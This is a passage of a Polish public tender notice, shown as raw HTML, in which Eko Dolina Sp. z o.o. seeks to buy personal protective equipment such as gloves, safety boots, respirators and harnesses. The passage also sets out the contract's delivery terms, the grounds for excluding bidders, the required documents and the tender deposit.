- gosflow. Wewnątrz bawełniana wyściółka - flok. Długość 30 cm. Kolor niebieski. Rozmiary: 7(S), 8(M), 9(L), 10(XL). Zgodność z normami: EN 374-2:2014 Rękawice chroniące przed substancjami chemicznymi i mikroorganizmami, EN 388:2006 Rękawice chroniące przed zagrożeniami mechanicznymi, EN 420+A1:2010 Rękawice ochronne. Wymagania ogólne. Dopuszczone do kontaktu z żywnością EN 1186-7:2006, EN 1186-14:2005.	27360 par24	Rękawice (tzw. wampirki)	Wykonane z dzianiny powleczonej podwójną gumą w części chwytnej zapewniające dobrą chwytność przy przenoszeniu towarów. Długi mankiet ze ściągaczem. Kolor niebieski. Potoczna nazwa - wampirki.	1870 par25	Rękawice (wkłady bawełniane)	Rękawice pięciopalczaste dziane bezszwowe z przędzy 100% bawełnianej ze ściągaczem w nadgarstku służące jako wkłady do innych rękawic - rozmiar 8 (grube). Uiglenie 7. Kategoria I. Zgodność z normą EN 420:2003+A1:2009 Rękawice ochronne. Wymagania ogólne i metody badań.	3200 par26	Rękawice (wkłady bawełniane)	Rękawice pięciopalczaste dziane bezszwowe z przędzy 100% bawełnianej ze ściągaczem w nadgarstku służące jako wkłady do innych rękawic - rozmiar 10 (grube). Uiglenie 7. Kategoria I. Zgodność z normą EN 420:2003+A1:2009 Rękawice ochronne. Wymagania ogólne i metody badań.	3300 par27	Rękawice (wkłady bawełniane)	Rękawice pięciopalczaste wykonane z dzianiny bawełnianej w kolorze naturalnym zakończone dzianym ściągaczem służące jako wkłady do innych rękawic - rozmiar 8 (długość - 24cm)	3200 par28	Rękawice robocze PCV, ochronne, powlekane, ocieplane (o poziomach skuteczności 1131)	Rękawice o szorstkiej chropowatej, nakrapianej powierzchni chwytnej, w środku wyściółka z polarowej tkaniny. Do prac w środowisku wilgotnym. Miękki mankiet do połowy przedramienia, dł. 30 cm. Rozmiar 8, 9, 10. Zgodne z normą EN388:2006 Zagrożenia chroniące przed zagrożeniami mechanicznymi (stopnie wytrzymałości: 1131). Zgodność z normą EN374-2 i EN420:2010 Rękawice ochronne. Wymagania ogólne i metody badań.	1644 pary29	Rękawice robocze nitrylowe (stopnie wytrzymałości 4211)	Wykonane z nitrylu na wkładzie z bawełnianego dżerseju, rękawica całkowicie powlekana niebieskim nitrylem, mankiet sztywny. Zgodność z normą EN388:2006 (stopnie wytrzymałości: 4211). Rozmiar 10.	402 pary30	Rękawice ocieplane (stopnie wytrzymałości: 1331) Rękawice ochronne ocieplane, wykonane z wysokiej jakości akrylowej przędzy pętelkowej, powlekane bardzo wytrzymałą gumą o porowatej strukturze, trudnościeralne, potocznie zwane zimowy dragon. Kolor niebieski. Zgodność z normą EN388:2006 Zagrożenia chroniące przed zagrożeniami mechanicznymi (stopnie wytrzymałości: 1331), zgodność z normą EN511 (poziomy odporności: X2X) i zgodność z normą EN420:2010 Rękawice ochronne. Wymagania ogólne i metody badań.	344 pary31	Rękawice robocze chroniące przed substancjami chemicznymi i mikroorganizmami (stopnie wytrzymałości: 4002)	Rękawice wykonane z zielonego nitrylu o długości 31 cm. Flokowane. Po wewnętrznej stronie posiadają strukturę plastra miodu ułatwiającą utrzymanie. Zgodność z normą EN388:2006 Zagrożenia chroniące przed zagrożeniami mechanicznymi (stopnie wytrzymałości: 4002), oraz zgodność z normą EN 374:2016. Rękawice chroniące przed substancjami chemicznymi i mikroorganizmami, Rozmiar 8 i 10.	30 par32	Rękawice robocze (stopnie wytrzymałości: 4131) Rękawice robocze wykonane z bezszwowej dzianiny poliestrowej powlekanej poliuretanem ze ściągaczem w nadgarstku. Kolor czarny. Zgodność z normą EN388:2006 Zagrożenia chroniące przed zagrożeniami mechanicznymi (stopnie wytrzymałości: 4131), zgodność z normą EN420:2010 Rękawice ochronne. Wymagania ogólne i metody badań.	480 par33	Obuwie profilaktyczne	Damskie klapki z powlekanej skóry z paskiem regulacyjnym na pięcie. Kolor biały.	3 pary34	Trzewiki robocze z płytką antyprzebiciową na całej długości stopy i podnoskiem metalowym w rozmiarach 36-47	Buty typu trzewik kat. S-3, sięgający kostki , wierzch - skórzany krupon barwiony, nieprzepuszczający wody, podeszwa wykonana z dwuwarstwowego poliuretanu, olejoodporna, podnosek wytrzymały na uderzenia min. 200J, podeszwa na całej długości stopy z wkładką antyprzebiciową, z urzeźbieniem odpornym na poślizg, ochrona antyelektrostatyczna. Zgodność z normami EN ISO 20345:2012 Środki ochrony indywidualnej - Obuwie bezpieczne; EN ISO 20346:2007 Środki ochrony indywidualnej - Obuwie ochronne	167 par35	Trzewiki robocze (półbuty) z płytką antyprzebiciową na całej długości stopy i podnoskiem metalowym w rozmiarach 36-47	Buty typu trzewik kat. S-3, sięgający poniżej kostki , wierzch - skórzany krupon barwiony, nieprzepuszczający wody, podeszwa wykonana z dwuwarstwowego poliuretanu, olejoodporna, podnosek wytrzymały na uderzenia min. 200J, podeszwa na całej długości stopy z wkładką antyprzebiciową, z urzeźbieniem odpornym na poślizg, ochrona antyelektrostatyczna. Zgodność z normami EN ISO 20345:2012 Środki ochrony indywidualnej - Obuwie bezpieczne; EN ISO 20346:2007 Środki ochrony indywidualnej - Obuwie ochronne	8 par36	Trzewiki robocze (ocieplane) z płytką antyprzebiciową na całej długości stopy i podnoskiem metalowym w rozmiarach 36-47	Buty typu trzewik kat. S-3, sięgający kostki , wierzch - skórzany krupon barwiony, nieprzepuszczający wody, podeszwa wykonana z dwuwarstwowego poliuretanu, olejoodporna, podnosek wytrzymały na uderzenia min. 200J, podeszwa na całej długości stopy z wkładką antyprzebiciową, z urzeźbieniem odpornym na poślizg, ochrona antyelektrostatyczna. Zgodność z normami EN ISO 20345:2012 Środki ochrony indywidualnej - Obuwie bezpieczne; EN ISO 20346:2007 Środki ochrony indywidualnej - Obuwie ochronne	6 par37	Ubranie przeciwdeszczowe (płaszcz +spodnie)	Dwuczęściowy komplet przeciwdeszczowy: płaszcz  3/4  z kapturem i spodnie. Wykonanie: poliester powlekany PVC. Szwy szyte i uszczelnione. PŁASZCZ: kaptur stały regulowany sznurkiem. Zapinanie na zamek błyskawiczny. SPODNIE: gumka lub elastyczny sznurek w talii. Kolor żółty. Zgodność z normą EN 343:2008 Odzież ochronna. Ochrona przed deszczem.	11 kpl38	Nauszniki przeciwhałasowe SNR - 26dB	Nauszniki przeciwhałasowe dielektryczne z czaszami z ABS oraz pianką syntetyczną. Giętki pałąk z regulacją wysokości. Zgodność z normą EN 352-1:2002 Ochronniki słuchu. Nauszniki przeciwhałasowe.	8 szt.39	Zatyczki przeciwhałasowe jednoparowe	Wkładki jednorazowe przeciwhałasowe z poliuretanu. Zgodność z normą EN 352-2 Ochronniki słuchu. Wkładki przeciwhałasowe.	120 par40	Zatyczki przeciwhałasowe wielorazowe na sznurku	Zatyczki przeciwhałasowe do wielokrotnego użytku, na sznurku. W komplecie pojemnik i spinka na pasek 3M. Zgodność z normą EN 352-2 Ochronniki słuchu. Wkładki przeciwhałasowe.	8 par41	Półmaska filtrująca typ P2	Półmaska filtrująca krótkiego użytkowania, klasa filtra FFP2. Zgodność z normą EN 149+A1:2010 Sprzęt ochrony układu oddechowego. Wymagania, badanie, znakowanie.	300 szt.42	Półmaska twarzowa ochronna do pochłaniaczy 3M	Półmaska ochronna wielokrotnego użytku wykonana z miękkiego silikonu do pochłaniaczy 3M (z pozycji 44). Zgodność z normą EN 140:2001 Sprzęt ochrony układu oddechowego. Półmaski i ćwierćmaski. Wymagania. 4 szt.43	Maska twarzowa pełna do pochłaniaczy 3M	Maska ochronna pełna wielokrotnego użycia wykonana z miękkiego silikonu. Szybka z poliwęglanu o szerokim polu widzenia. Zgodność z normą EN 136:2001 Sprzęt ochrony układu oddechowego. Maski. Wymagania.	1 szt.44	Pochłaniacze do półmasek i masek 3M (ABEK1)	Pochłaniacze wielogazowe chroniące przed gazami organicznymi, gazami nieorganicznymi, gazami kwaśnymi, amoniakiem. Przeznaczone do półmasek i masek firmy 3M. Zgodność z normą EN 14387+A1:2010 Sprzęt ochrony układu oddechowego. Pochłaniacze i filtropochłaniacze. Wymagania.	105 szt.45	Zestaw chroniący przed upadkiem z wysokości(rozmiar XXL)	Zestaw powinien składać się z szelek bezpieczeństwa z dwoma punktami zaczepienia chroniącymi przed upadkiem (grzbietowo-mostkowy), amortyzator z liną skręcaną w kształcie litery Y, długość 2 metry; 3 zatrzaśniki na śrubę i 2 stalowe zatrzaśniki z otworem 62mm. 1 torba. Zgodność z normami: Środki ochrony indywidualnej chroniące przed upadkiem z wysokości EN 354:2010 Linki bezpieczeństwa, EN 361:2005 Szelki bezpieczeństwa, EN 362:2006 Łączniki.	1 kpl46	Szelki do pracy w uwisie (rozmiar XXL)	Szelki bezpieczeństwa wyposażone w tylny i przedni punkt zaczepowy do pracy w podwieszeniu, z regulacją pasów udowych, pasów barkowych i pasa piersiowego, obrotowy pas do pracy "w podparciu" z bocznymi klamrami zaczepowymi typu ,,D". Zgodność z normami EN 358:2002 Pasy ustalające pozycję podczas pracy i ograniczające przemieszczanie oraz linki ustalające pozycję podczas pracy; EN 361:2005 - Środki ochrony indywidualnej sprzęt chroniące przed upadkiem z wysokości. Szelki bezpieczeństwa; EN 813:2008 Indywidualny sprzęt chroniący przed upadkiem z wysokości. Uprząż biodrowa. Szelki posiadają automatyczne klamry łącząco-regulacyjne.	1 kpl47	Linka asekuracyjna 20mb	Linka asekuracyjna fi 15 mm o długości 20mb z dwoma dużymi zatrzaśnikami na obu końcach. Zgodność z normami: EN 354:2010 Środki ochrony indywidualnej chroniące przed upadkiem z wysokości Linki bezpieczeństwa, EN 362:2006 Środki ochrony indywidualnej chroniące przed upadkiem z wysokości.	3 szt.48	Przyłbica ochronna poliwęglanowa	Naczółek z tworzywa sztucznego, szyba z poliwęglanu o wymiarach 20 na 39 cm, regulowany hamak, piankowa wyściółka, zapasowa szyba poliwęglanowa, Klasa optyczna 1, zgodność z normą EN166:2005 Ochrona indywidualna oczu. Wymagania.	6 szt.49	Osłona twarzy - przyłbica z nausznikami	Osłona twarzy z ochronnikami słuchu i szybką. Składa się z szybki z poliwęglanu, nauszników, nagłowia i zespołu zawiasowego. Możliwość uniesienia osłony i zablokowania jej pod kątem 90°, szybka i łatwa wymiana ekranu, osłona twarzy spełnia wymagania EN166:2001.B, nauszniki - wygłuszenie: H=31 dB, M=28 dB, L=22 dB, SNR=30 dB, możliwość noszenia nauszników bez osłony, zapewniają ochronę przed małymi odpryskami ciał stałych o energii uderzenia do 120 m/s (B), nauszniki powinny spełniać wymagania normy EN352-1:2005 Ochronniki słuchu. Wymagania ogólne. Nauszniki przeciwhałasowe. Dla kosiarzy, leśników, drwali i do pracy w tartaku. Kategoria I.	4 szt.50	Rękawice elektroizolacyjne 30 kV	Rękawice elektroizolacyjne przeznaczone do ochrony rąk przed porażeniem prądem elektrycznym. Zgodnie z normą PN-EN 60903-2006 Prace pod napięciem. Rękawice z materiału izolacyjnego.	1 para51	Kalosze dielektryczne 30kV	Kalosze przeznaczone do pracy przy urządzeniach energetycznych do 30kV napięcia przemiennego, nakładane na inne obuwie robocze. Zgodnie z normą EN 50321-1:2018-05 Prace pod napięciem. Obuwie do ochrony przed porażeniem prądem elektrycznym. Obuwie i kalosze elektroizolacyjne 1 para52	Spodniobuty/wodery Wykonane z wodoochronnej, wytrzymałej tkaniny powlekanej typu Plavitex Heavy Duty, zapewniają skuteczną ochronę przed wodą, guma ściągająca dopasowująca rozmiar do obwodu klatki piersiowej, szwy obustronnie zgrzewane, kieszeń wewnętrzna na dokumenty, podwyższona odporność na uszkodzenia mechaniczne, wgrzane na stałe kalosze. Wodery z wzmocnieniami na kolanach, szelki z elastycznej, szerokiej gumy i regulacja w pasie. Gramatura materiału: 680 gram/m?. Grubość materiału: 0,68 mm. Zgodność z normą EN 343+A1:2007.1 szt.53	Apteczka przenośna zakładowa AZP100	Przenośna apteczka pierwszej pomocy, zakładowa AZP100. Wykonana z tworzywa sztucznego (ABS), z wieszakiem montowanym na ścianę, wyposażenie zgodne z normą DIN 13157:2009 Wyposażenie apteczki. Zawartość: plaster z opatrunkiem 6x10 cm (8 szt.); plaster na szpulce 5 m x 2,5 cm (1 szt.); zestaw plastrów, 4 rodzaje; bandaż z kompresem 6x8 cm (1 szt.), bandaż elastyczny 4 m x 6 cm (2 szt.); bandaż elastyczny 4 m x 8 cm (2 szt.); rękawiczki winylowe (2 pary); chusta opatrunkowa 60x80 cm (1 szt.), chusta z fizeliny 20x30 cm (5 szt.); bandaż z kompresem (opatrunek indywidualny) 8x10 cm (3 szt.); bandaż z kompresem (opatrunek indywidualny) 10x12 cm (1 szt.); kompres na rany 10x10 cm (6 szt.); kompres na oko 5x7,5 cm (2 szt.); zimny kompres (1 szt.); chusta trójkątna 96x96x136 cm (2 szt.); koc termiczny 160x210 cm (1 szt.); nożyczki 19,5 cm (1 szt.); torba foliowa (2 szt.); aparat do sztucznego oddychania; instrukcja "pierwsza pomoc w nagłych wypadkach" oraz spis wyposażenia.	4 szt.Dodatkowe wymagania:1.	W cenie zawarte są trwałe i niespieralne oznakowania ubrań z imienia i nazwiska umieszczone od wewnątrz ubrania w formie wprasowanki.2.	Wykonawca zobowiązuje się do udzielenia 12 miesięcznej gwarancji nadostarczany asortyment wymieniony w pozycji nr 1, 2, 6, 17, 18, 19, 20, 21, 33, 34, 35, 36, 45, 46, 47, 50, 51, 52 w tabeli powyżej, jednakże nie krótszej niż gwarancja producenta wyrobu.Termin gwarancji liczony będzie od dnia dostarczenia asortymentu.3.	Realizacja zamówienia sukcesywnie przez okres trwania umowy od dnia jej podpisania każdorazowo na podstawie odrębnych zamówień częściowych.4.	Termin dostaw częściowych: nie dłużej niż 14 dni od dnia złożenia zamówienia.5.	Transport zapewnia Wykonawca.6.	Wszystkie wyroby powinny posiadać atesty oraz oznakowanie i spełniać wymagania C? (Conformite Europeenne) lub równoważne.7.	Tabele rozmiarów przekazane zostaną Wykonawcy przez Zamawiającego wraz z każdym udzielanym przez Zamawiającego zamówieniem jednostkowym.8.	Wykonawca zobowiązany będzie do dostarczenia przedmiotu dostaw zgodnie z tabelą rozmiarów dla każdego pracownika imiennie oraz do oznakowania ubrań z imienia i nazwiska pracownika zgodnie z zamówieniem jednostkowym.9.	Miejsce dostaw: Eko Dolina Sp. z o.o. , Łężyce, Al. Parku Krajobrazowego 99, 84-207 KoleczkowoUWAGA:Zamawiający informuje, że na terenie zakładu Eko Dolina Sp. z o.o. obowiązuje system zarządzania środowiskowego zgodny z PN-EN ISO 14001:2015.Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">18100000-0</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>18130000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>18141000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>18830000-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">12</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>12</TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Termin wykonania zamówienia: 12 miesięcy od podpisania umowy lub do wyczerpania określonego w przedmiocie zamówienia asortymentu. </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje szczegółowego warunku w tym zakresie. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje szczegółowego warunku w tym zakresie. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie precyzuje szczegółowego warunku w tym zakresie. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a)	odpisu z właściwego rejestru lub centralnej ewidencji informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp;b) podpisane oświadczenie o braku przesłanek wykluczenia z postępowania (załącznik 2 do SIWZ); Ponadto: o	Zgodnie z art. 24 ust.11 ustawy Prawo zamówień publicznych, Wykonawca w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust.5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie (zgodne z załącznikiem nr 3) o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w ustawie o ochronie konkurencji i konsumentów (t.j. Dz. U. 2017.229). Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia; Wykonawca może skorzystać z załącznika nr 3 do SIWZ;o	Zamawiający zgodnie z art. 25 ust. 1 ustawy Pzp dla potwierdzenia spełnienia braku podstaw do wykluczenia skorzysta z dokumentów znajdujących się w ogólnie dostępnych bazach danych.o	Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust.5 pkt 1, 2, 4 ustawy Pzp, tj.:- wykonawcy w stosunku do którego otwarto likwidację, w zatwierdzonym przez sąd układzie w postępowaniu restrukturyzacyjnym jest przewidziane zaspokojenie wierzycieli przez likwidację jego majątku lub sąd zarządził likwidację jego majątku w trybie art. 332 ust.1 ustawy z dn. 15.05.2015r. - Prawo restrukturyzacyjne (t.j. Dz. U. 2017.1508) lub którego upadłość ogłoszono, z wyjątkiem wykonawcy, który po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego, chyba że sąd zarządził likwidację jego majątku w trybie art. 366 ust.1 ustawy z dn. 28.02.2003r. - Prawo upadłościowe (t.j. Dz. U. 2017.2344);- wykonawcy który w sposób zawiniony poważnie naruszył obowiązki zawodowe, co podważa jego uczciwość, w szczególności gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą stosownych środków dowodowych;- wykonawcy, który z przyczyn leżących po jego stronie, nie wykonał albo nienależycie wykonał w istotnym stopniu wcześniejszą umowę w sprawie zamówienia publicznego zawartą z zamawiającym, o którym mowa w art.3 ust.1 pkt 1-4 co doprowadziło do rozwiązania umowy lub zasądzenia odszkodowania.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">2.	Zamawiający przed wyborem najkorzystniejszej oferty, wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia następujących oświadczeń lub dokumentów:a)	w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego: ?	atestów i deklaracji zgodności CE (Conformité Européenne) dla każdego z oferowanych produktów lub dokumentów równoważnych. Za dokumenty równoważne będą uznawane dokumenty wydane przez odpowiednie władze uprawnione do certyfikacji wyrobów i uznawane w krajach Unii Europejskiej a potwierdzające zgodność wyrobu z wymaganiami zasadniczymi właściwych Dyrektyw Unii Europejskiej oraz jeżeli wynika to z odrębnych przepisów potwierdzone właściwymi certyfikatami.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">o	Zgodnie z art. 24 ust.11 ustawy Prawo zamówień publicznych, Wykonawca w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust.5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie (zgodne z załącznikiem nr 3) o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w ustawie o ochronie konkurencji i konsumentów (t.j. Dz. U. 2017.229). Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia; Wykonawca może skorzystać z załącznika nr 3 do SIWZ;</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Ustala się wadium w wysokości: 3.000,00 zł (słownie: trzy tysiące złotych 00/100)Wykonawca wnosi wadium: - w pieniądzu, sposób przekazania: wpłaca się przelewem na rachunek bankowy Zamawiającego wskazany poniżej:Bank Pekao S.A. III O/ w Gdyni ul. Hutnicza 3a, 81-212 Gdynia nr 28124035231111000043351129 - lub w jednej z poniżej podanych form: 1.	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 2.	gwarancjach bankowych 3.	w gwarancjach ubezpieczeniowych 4.	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014r. poz. 1804 oraz z 2015r. poz. 978 i 1240).Wadium wnosi się przed upływem ostatecznego terminu składania ofert. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.W przypadku złożenia wadium w innej formie niż pieniężna, Zamawiający wymaga załączenia do oferty dokumentu wniesienia wadium w oryginale.Dokument w formie poręczenia i/lub gwarancji winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako 